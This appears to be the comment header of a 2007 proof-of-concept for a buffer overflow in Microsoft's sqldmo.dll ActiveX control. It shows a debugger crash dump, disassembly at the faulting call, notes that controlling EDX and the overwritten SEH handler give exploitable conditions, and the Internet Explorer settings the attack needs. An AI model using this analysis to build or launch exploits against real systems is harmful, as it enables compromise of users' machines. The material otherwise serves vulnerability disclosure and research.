<!--
18.48 01/09/2007
Microsoft SQL Server Distributed Management Objects OLE DLL for
SQL Enterprise Manager (sqldmo.dll) remote buffer overflow poc
file version: 2000.085.2004.00
product version: 8.05.2004
passing some fuzzy chars to Start method:
EAX 00000000
ECX 00620062
EDX 00620062
EBX 1C3A3638 SQLDMO.1C3A3638
ESP 0013D87C
EBP 0013DAA8
ESI 03042544
EDI 0013DAA0 ASCII "|T"
EIP 1C1C9800 SQLDMO.1C1C9800
...
1C1C97EA 8D8D E4FDFFFF LEA ECX,DWORD PTR SS:[EBP-21C]
1C1C97F0 51 PUSH ECX
1C1C97F1 8B95 E0FDFFFF MOV EDX,DWORD PTR SS:[EBP-220]
1C1C97F7 8B02 MOV EAX,DWORD PTR DS:[EDX]
1C1C97F9 8B8D E0FDFFFF MOV ECX,DWORD PTR SS:[EBP-220]
1C1C97FF 51 PUSH ECX
1C1C9800 FF90 DC010000 CALL DWORD PTR DS:[EAX+1DC] <--- exception
access violation when reading 000001DC
by manipulating edx you have the first exploitable condition...
also seh is overwritten, then:
EAX 00000000
ECX 00610061
EDX 7C9137D8 ntdll.7C9137D8
EBX 00000000
ESP 0013D4AC
EBP 0013D4CC
ESI 00000000
EDI 00000000
EIP 00610061
object safety report:
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
means: works according to security settings for the Internet zone
needs Activex "not marked as safe" option set to "ask" or "enabled" (not the predefined one)
rgod.
http://retrogod.altervista.org
-->